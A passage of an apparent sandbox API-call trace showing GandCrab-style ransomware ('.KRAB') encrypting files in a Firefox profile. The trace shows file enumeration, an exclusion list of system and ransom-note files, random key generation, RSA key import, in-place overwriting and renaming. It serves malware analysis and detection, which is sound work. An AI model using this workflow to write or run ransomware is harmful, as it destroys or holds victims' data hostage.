(lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0084.364] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0084.364] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338db7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338db7c*=0xc000, lpOverlapped=0x0) returned 1 [0084.413] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xffff4000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.413] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xc000, lpNumberOfBytesWritten=0x338db78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338db78*=0xc000, lpOverlapped=0x0) returned 1 [0084.413] WriteFile (in: hFile=0x420, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338db78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338db78*=0x208, lpOverlapped=0x0) returned 1 [0084.413] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.555] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.556] CloseHandle (hObject=0x420) returned 1 [0084.556] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.556] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.krab")) returned 1 [0084.557] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.558] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0084.558] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0084.558] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0084.558] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a08d2ca4dee3d.lock" [0084.558] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.558] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 150 [0084.558] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a08d2ca4dee3d.lock") returned 145 [0084.558] lstrlenW (lpString=".lock") returned 5 [0084.558] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.559] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0084.559] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.559] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.559] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0084.559] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0084.559] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0084.560] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\KRAB-DECRYPT.txt" [0084.560] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.560] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\KRAB-DECRYPT.txt.KRAB") returned 143 [0084.560] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\KRAB-DECRYPT.txt") returned 138 [0084.560] lstrlenW (lpString=".txt") returned 4 [0084.560] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.560] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0084.560] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.561] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\KRAB-DECRYPT.txt") returned 138 [0084.561] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\KRAB-DECRYPT.txt") returned 138 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0084.561] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0084.561] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.561] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 0 [0084.562] FindClose (in: hFindFile=0x1023338 | out: hFindFile=0x1023338) returned 1 [0084.562] CloseHandle (hObject=0x7dc) returned 1 [0084.562] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0084.562] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0084.562] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0084.562] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\KRAB-DECRYPT.txt" [0084.562] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.562] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\KRAB-DECRYPT.txt.KRAB") returned 139 [0084.562] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\KRAB-DECRYPT.txt") returned 134 [0084.562] lstrlenW (lpString=".txt") returned 4 [0084.562] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.564] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0084.564] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.564] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\KRAB-DECRYPT.txt") returned 134 [0084.564] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\KRAB-DECRYPT.txt") returned 134 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0084.564] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0084.565] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.565] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0 [0084.565] FindClose (in: hFindFile=0x1023238 | out: hFindFile=0x1023238) returned 1 [0084.565] CloseHandle (hObject=0x72c) returned 1 [0084.565] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0084.565] FindClose (in: hFindFile=0x10231f8 | out: hFindFile=0x10231f8) returned 1 [0084.565] CloseHandle (hObject=0x718) returned 1 [0084.566] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0084.566] FindClose (in: hFindFile=0x10235f8 | out: hFindFile=0x10235f8) returned 1 [0084.566] CloseHandle (hObject=0x7ec) returned 1 [0084.566] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0084.566] lstrcmpW (lpString1="storage.sqlite", lpString2=".") returned 1 [0084.566] lstrcmpW (lpString1="storage.sqlite", lpString2="..") returned 1 [0084.566] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="storage.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite" [0084.566] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.566] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite.KRAB") returned 99 [0084.566] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0084.567] lstrlenW (lpString=".sqlite") returned 7 [0084.567] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.567] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0084.567] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.567] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0084.567] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite") returned 94 [0084.567] lstrcmpiW (lpString1="storage.sqlite", lpString2="desktop.ini") returned 1 [0084.567] lstrcmpiW (lpString1="storage.sqlite", lpString2="autorun.inf") returned 1 [0084.567] lstrcmpiW (lpString1="storage.sqlite", lpString2="ntuser.dat") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="iconcache.db") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="bootsect.bak") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="boot.ini") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="ntuser.dat.log") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="thumbs.db") returned -1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="ntldr") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="NTDETECT.COM") returned 1 [0084.568] lstrcmpiW (lpString1="storage.sqlite", lpString2="Bootfont.bin") returned 1 [0084.568] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.568] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011458) returned 1 [0084.570] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.570] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.576] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.576] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0084.576] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0084.576] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.576] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011678) returned 1 [0084.578] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.578] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.579] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.579] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0084.579] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0084.579] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.579] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011238) returned 1 [0084.581] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0084.581] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0084.581] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0084.581] GetLastError () returned 0x0 [0084.581] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0084.581] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0084.581] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011238) returned 1 [0084.583] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0084.583] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0084.583] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0084.583] GetLastError () returned 0x0 [0084.583] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0084.583] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0084.583] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0084.584] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0084.584] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0084.586] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x200, lpOverlapped=0x0) returned 1 [0084.602] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffe00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.602] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x200, lpOverlapped=0x0) returned 1 [0084.602] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0084.652] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.656] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.656] CloseHandle (hObject=0x7ec) returned 1 [0084.656] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.657] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage.sqlite.krab")) returned 1 [0084.657] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.658] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0084.658] lstrcmpW (lpString1="times.json", lpString2=".") returned 1 [0084.658] lstrcmpW (lpString1="times.json", lpString2="..") returned 1 [0084.658] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="times.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json" [0084.658] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.658] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json.KRAB") returned 95 [0084.658] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0084.658] lstrlenW (lpString=".json") returned 5 [0084.658] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.659] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".json ") returned 6 [0084.659] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.659] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0084.659] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="desktop.ini") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="autorun.inf") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="ntuser.dat") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="iconcache.db") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="bootsect.bak") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="boot.ini") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="ntuser.dat.log") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="thumbs.db") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="KRAB-DECRYPT.html") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.659] lstrcmpiW (lpString1="times.json", lpString2="ntldr") returned 1 [0084.660] lstrcmpiW (lpString1="times.json", lpString2="NTDETECT.COM") returned 1 [0084.660] lstrcmpiW (lpString1="times.json", lpString2="Bootfont.bin") returned 1 [0084.660] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.660] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010df8) returned 1 [0084.661] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.662] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.662] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.662] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0084.662] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0084.662] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.663] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011458) returned 1 [0084.664] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.664] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.665] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.665] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0084.665] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0084.665] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.665] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010df8) returned 1 [0084.667] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0084.667] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0084.667] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, 